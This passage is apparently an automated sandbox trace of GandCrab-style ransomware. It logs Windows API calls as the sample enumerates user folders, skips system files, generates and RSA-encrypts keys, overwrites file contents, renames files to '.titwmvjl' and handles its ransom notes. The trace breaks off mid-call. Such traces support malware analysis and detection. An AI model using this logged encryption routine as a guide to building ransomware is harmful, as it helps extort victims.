x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0085.992] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0085.993] CloseHandle (hObject=0x2bc) returned 1 [0085.993] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.993] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.994] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x133)) [0085.994] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.994] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.994] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.994] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a09d2ca4deb61a.lock") returned 78 [0085.995] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0085.996] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.996] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.997] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\") returned 54 [0085.997] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*" [0085.997] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5033b8 [0085.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.997] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0085.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.997] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0085.997] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0085.997] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0085.998] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a09d2ca4deb61a.lock" [0085.998] lstrlenW (lpString=".titwmvjl") returned 9 [0085.998] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a09d2ca4deb61a.lock") returned 78 [0085.998] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.998] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 87 [0085.998] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\d2ca4a09d2ca4deb61a.lock") returned 78 [0085.998] lstrlenW (lpString=".lock") returned 5 [0085.998] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.998] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0085.998] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.998] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.998] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0085.998] lstrcmpW (lpString1="roottools.conf", lpString2=".") returned 1 [0085.998] lstrcmpW (lpString1="roottools.conf", lpString2="..") returned 1 [0085.999] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="roottools.conf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" [0085.999] lstrlenW (lpString=".titwmvjl") returned 9 [0085.999] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0085.999] VirtualAlloc (lpAddress=0x0, dwSize=0xc8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.999] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.titwmvjl") returned 77 [0085.999] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0085.999] lstrlenW (lpString=".conf") returned 5 [0085.999] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.999] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".conf ") returned 6 [0085.999] lstrcmpiW (lpString1=".conf", lpString2=".titwmvjl") returned -1 [0085.999] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.999] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0085.999] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="desktop.ini") returned 1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="autorun.inf") returned 1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="ntuser.dat") returned 1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="iconcache.db") returned 1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="bootsect.bak") returned 1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="boot.ini") returned 1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="ntuser.dat.log") returned 1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="thumbs.db") returned -1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.999] lstrcmpiW (lpString1="roottools.conf", lpString2="KRAB-DECRYPT.html") returned 1 [0086.000] lstrcmpiW (lpString1="roottools.conf", lpString2="CRAB-DECRYPT.html") returned 1 [0086.000] lstrcmpiW (lpString1="roottools.conf", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.000] lstrcmpiW (lpString1="roottools.conf", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.000] lstrcmpiW (lpString1="roottools.conf", lpString2="ntldr") returned 1 [0086.000] lstrcmpiW (lpString1="roottools.conf", lpString2="NTDETECT.COM") returned 1 [0086.000] lstrcmpiW (lpString1="roottools.conf", lpString2="Bootfont.bin") returned 1 [0086.000] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf") returned 68 [0086.000] lstrlenW (lpString=".conf") returned 5 [0086.000] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.000] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".conf ") returned 6 [0086.000] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.000] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.000] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\roottools.conf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0086.001] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0086.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.001] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0086.002] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.003] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.003] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.003] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0086.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.003] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.003] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.003] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0086.004] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.005] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.005] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.005] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0086.005] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.005] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.005] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.005] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.005] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0086.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.007] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503578) returned 1 [0086.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.007] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0086.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.007] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0086.007] GetLastError () returned 0x0 [0086.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.007] CryptDestroyKey (hKey=0x503578) returned 1 [0086.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.008] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.008] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0086.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.009] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503278) returned 1 [0086.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.009] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0086.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.009] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0086.010] GetLastError () returned 0x0 [0086.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.010] CryptDestroyKey (hKey=0x503278) returned 1 [0086.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.010] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.010] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.010] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.010] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x4c, lpOverlapped=0x0) returned 1 [0086.023] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffffb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.023] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x4c, lpOverlapped=0x0) returned 1 [0086.025] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.025] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0086.027] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.030] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.030] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.030] CloseHandle (hObject=0x2c4) returned 1 [0086.031] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\roottools.conf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\roottools\\roottools.conf.titwmvjl"), dwFlags=0x1) returned 1 [0086.032] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.032] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0086.032] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0086.032] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0086.032] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\TITWMVJL-DECRYPT.txt" [0086.032] lstrlenW (lpString=".titwmvjl") returned 9 [0086.032] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\TITWMVJL-DECRYPT.txt") returned 74 [0086.032] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.033] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 83 [0086.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\TITWMVJL-DECRYPT.txt") returned 74 [0086.033] lstrlenW (lpString=".txt") returned 4 [0086.033] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.033] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0086.033] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0086.033] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\TITWMVJL-DECRYPT.txt") returned 74 [0086.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\TITWMVJL-DECRYPT.txt") returned 74 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0086.033] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0086.033] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.034] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0086.034] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0086.034] CloseHandle (hObject=0x2bc) returned 1 [0086.034] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0086.034] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0086.034] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0086.034] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\TITWMVJL-DECRYPT.txt" [0086.034] lstrlenW (lpString=".titwmvjl") returned 9 [0086.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\TITWMVJL-DECRYPT.txt") returned 64 [0086.034] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.035] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 73 [0086.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\TITWMVJL-DECRYPT.txt") returned 64 [0086.035] lstrlenW (lpString=".txt") returned 4 [0086.035] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.035] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0086.035] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0086.035] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\TITWMVJL-DECRYPT.txt") returned 64 [0086.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\TITWMVJL-DECRYPT.txt") returned 64 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0086.035] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0086.035] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.036] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0086.036] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0086.036] CloseHandle (hObject=0x2b4) returned 1 [0086.036] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.036] lstrcmpW (lpString1="Sun", lpString2=".") returned 1 [0086.036] lstrcmpW (lpString1="Sun", lpString2="..") returned 1 [0086.036] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Sun" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun" [0086.036] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\" [0086.036] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0086.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.037] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.037] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: 